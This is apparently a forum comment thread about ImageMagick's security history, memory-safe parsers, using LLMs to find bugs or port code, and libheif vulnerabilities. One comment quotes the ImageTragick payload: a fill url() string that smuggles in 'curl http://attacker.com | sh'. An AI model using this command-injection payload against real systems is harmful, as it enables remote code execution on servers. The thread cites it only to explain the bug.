4 ms·
Unsandboxed ImageMagick is known for being a security nightmare even back when PHP ruled the world (not saying sandboxing is a panacea either, it just requires
by oefrha 15d ago
Unsandboxed ImageMagick is known for being a security nightmare even back when PHP ruled the world (not saying sandboxing is a panacea either, it just requires a different and potentially harder exploit to develop a full chain). Difference is it's easier than ever to turn vulnerabilities into full compromises. At some point we'll have to replace all parsers with something at least as safe as https://github.com/google/wuffs https://github.com/google/wuffs right? Otherwise ImageMagick and co. will just keep giving.
- walrus01 15d agoIt does make me wonder how much this could be hardened by, to put it in an extremely crude way, taking the current imagemagick code base and throwing a bunch of adversarial SOTA LLMs at it to discover 'bugs' and exploits of this nature until it can be coaxed into a less dangerous state. Or even using the LLMs to fully port its functionality to a memory safe language. Would take a while to get all the changes approved and then into various distribution imagemagick packages.
- sroussey 15d agoMaybe these big ai labs will uses their own devices to find and fix bugs up and down their stack and contribute that back.
- sweetjuly 15d agoI suspect the latter is much easier and cheaper than the former? You can port a lot of software with cheap (or even local) models if you're tenacious whereas finding all the bugs is both very very expensive (if it's even possible) and potentially never ending (there's always new code and bugs!).
- msm_ 14d agoMany of the imagemagick bugs (in fact, most imagemagick bugs I remember as a former CTF player) are a logic bugs, where external program was invoked with improper sanitisation. Rewriting the code into a memory safe language is not a panacea and would not help. Famously, ImageTragick was just "fill 'url(https://example.com https://example.com"; curl http://attacker.com http://attacker.com | sh ")'"
- walrus01 14d agoThat's a very good point. I've had moderately good success with even not very smart LLMs 'fixing' things that would otherwise accept arbitrary user generated text input, to run things through a thorough sanitization pipeline, the actual code for a sanitizer is not very complex at all.
- oefrha 15d agoBtw there are so many "critical" vulnerabilities in libheif I can't even tell if I have them all patched. Just awesome. https://github.com/strukturag/libheif/security/advisories?query=severity%3Acritical++ https://github.com/strukturag/libheif/security/advisories?qu... https://ubuntu.com/security/notices/USN-8649-1 https://ubuntu.com/security/notices/USN-8649-1 https://ubuntu.com/security/notices/USN-8683-1 https://ubuntu.com/security/notices/USN-8683-1 https://ubuntu.com/security/notices/USN-8774-1 https://ubuntu.com/security/notices/USN-8774-1
- djxfade 15d agoPHP still rules the world, even though many doesn't want to realize it. It's still the biggest web language by a far margin
- willy_k 15d agoPhones don’t “rule the world” of cinematography, despite the majority of videos being from phones. The serious stuff, professional and personal, uses cameras.
- someothherguyy 15d agotoo powerful to give up, sweet imagick love